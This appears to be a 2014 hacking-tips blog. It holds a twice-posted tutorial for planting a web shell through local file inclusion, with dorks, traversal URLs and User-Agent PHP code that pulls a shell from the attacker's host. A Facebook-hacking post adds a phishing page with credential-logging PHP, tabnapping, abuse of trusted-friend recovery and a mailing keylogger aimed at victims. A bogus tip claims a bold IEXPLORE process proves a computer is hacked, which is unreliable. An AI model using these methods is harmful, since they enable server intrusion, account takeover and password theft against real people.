Thursday 20 February 2014

Shell Via LFI And /Proc/Self/Environ

Basicly LFI stands for Local File Inclusion. This attack can allow the attacker to gain access to the server by upload a shell to the website.

I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/

II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=

III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>

IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

It should look like showed in the picture 2.

V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F

VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd

VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ

so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron

VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.

Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.

IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php

If that didn't work then try this:
http://www.site.com/urshellname.php

X. Now you have access to the server and it seems that you uploaded your shell successfully

Hit like if you have found it useful!



Photo: Shell Via LFI And /Proc/Self/Environ

Basicly LFI stands for Local File Inclusion. This attack can allow the attacker to gain access to the server by upload a shell to the website.

I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/

II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=

III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>

IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

It should look like showed in the picture 2.

V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F

VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd

VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ

so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron

VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.

Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.

IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php

If that didn't work then try this:
http://www.site.com/urshellname.php

X. Now you have access to the server and it seems that you uploaded your shell successfully

Hit like if you have found it useful!

How To Know If YouR coMputer Is Hacked


1- Go To Your Windows Task Manager ( Ctrl+alt+Del )

2- then Go To ''Process''

3-If You Found ''IEXPLORE'' Written in Bold Like It Shown In The Pic That Mean Your Computer Is Hacked.

Photo: How To Know If YouR coMputer Is Hacked {{Share It ;) }}
************************************************

1- Go To Your Windows Task Manager ( Ctrl+alt+Del )

2- then Go To ''Process''

3-If You Found ''IEXPLORE'' Written in Bold Like It Shown In The Pic That Mean Your Computer Is Hacked.




#4in

Special Hacking techniques to Hack a Facebook Account

(Special Hacking Post)

Today
i will give u fb hacking tutorial
We can hack fb account by the following 4 ways :-

1. Tabnapping
2. Phising
3. Keylogging
4. 3 Friend Trick

Lets Start

1. Hack Facebook Account by Tab Napping Method :-

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube,google etc and came back to your website then your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you.

So lets see how to hack facebook account using tab napping trick.

Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website
search on google and create an account.

2) Now download the script and phishing pages from here:
http://www.mediafire.com/?0zrp565h8v90jbe

3) Extract it and you will see the files and folders

4) Upload all the files and folders to your website.

5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.

Actually the game is very dificult and he/she will not win in less time and he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue.

6) When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.
Now just open www.your-website.com/fb/password.html and you will see the email and passwords.

Enjoy..........!!

2. HOW TO HACK FACEBOOK ACCOUNT USING PHISHING

Phishing Is The Easiest Method To Hack Facebook Account Even By This Method U Can Hack Any Email Account Also.To Know How To Hack FB Using Phishing Just Follow The Steps-

step1: go to www.facebook.com

step2: right click on white space and select the "View page source"

step3: copy the code to notepad

step4: now press Ctrl + F and write "action" and hit "Find next"

step5: u will get action="https://www.facebook.com/login.php?login_attempt=1" and edit this to action="hack.php" and save the document as index.html

step6: now copy the following code and save it as hack.php

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

step7: now create a notepad file as pswrd.txt and there should not be any contents

step8: now u have 3 file index.html , hack.php & pswrd.txt.Now upload all the three files in any free webhosting

step9: copy the url of index.html and send to the victim.When victim login to his account, his password will be sent to the file "pswrd.txt"

3. 3 Friend Trick :

First u need 3 fake accounts

Note : The 3 fake account must be 7 day older, otherwise this Facebook Hack will not work So lets start on our tutorial on Hack Facebook Account For Free br / >

1. Go to Facebook.com and click on Forgot Password.

2. Now give the victim's Facebook account email or if give the FB username or Profile name and click on search. And then you will get the victims profile account. Just click on "This is my Account".

3. Then click on "No longer have access to this".

4. Now you will be asked to enter new email address, just enter your own new email address.

5. Now Facebook will ask you to give security question's answer. Not to worry, just enter wrong answer thrice and you will be taken to the new page.

6. Here is the main part of Hacking Of Facebook Account. Click on Continue and FB will ask you to select 3 Trusted Friends. Their will be a full friend's list of the victim which also includes your previously created "Three Fake Facebook Account" . Just select that three accounts and then Facebook will send security codes to our fake accounts. Now collect those security codes and enter it. Then Facebook will send "Password Recovery Email" at the email address we entered in 4th step. Thus you can easily reset the password of victim's account.

No we have successfully done with Hack Facebook Accounts

Note : We have received the problems like they don't get the new page in
step 5. So this depends on the victim's activity on Facebook account.

So friends, I hope you enjoyed this article on Hack Facebook Accounts and if you have any problem with this Hack Facebook Account

4. Keylogging :

1. first u must have the emissary keylogger in ur system. and Net Framework installed bcoz keyloggers wont work without this.
2. then u have 2 create fake account at google. its use is this when u hack a person his data will be mailed to ur account.
3. ok when u do these 2 Now open the the Emissary Keylogger.
4. their you can see Gmail User Name. and below it Gmail Password. PUt the gamil account with password their . Bcoz this will confrm itslef that the mails have 2 sent for ths account or not..
5.when u put their u can see Test Mail.. just click on it . it will be blink for a minute and then a window will appear and saying "Message has sent. Check your mail." then check ur mail is their a msg recieved from the emissary. if not then try again bcoz u hv enterd the pass or id wrong.
6. After it below u can see Server Namme in the bracket will be written "sever.exe" well u can change the name like Nav.exe..NOTe u can only change server but not .exe e.g.. NAv.exe.
7. Below that is Interval .. IT means that what u want in how much minutes the mail come to u from the victms pc. i like to give it 3 bcoz this is gud.
8. At the End u can see Build Server. just click on it and i file will apear at ur system by then name u have given in server name . and it will be at the same directory where the emissary keylogger is..
9. NOW the file is created with u.. Give that file to the victm who u want to hack If he OPens it then he will be hacked..
10. If u are worried how can i gave them . Then post it to the free web hosting space like www.mediafire.com

#5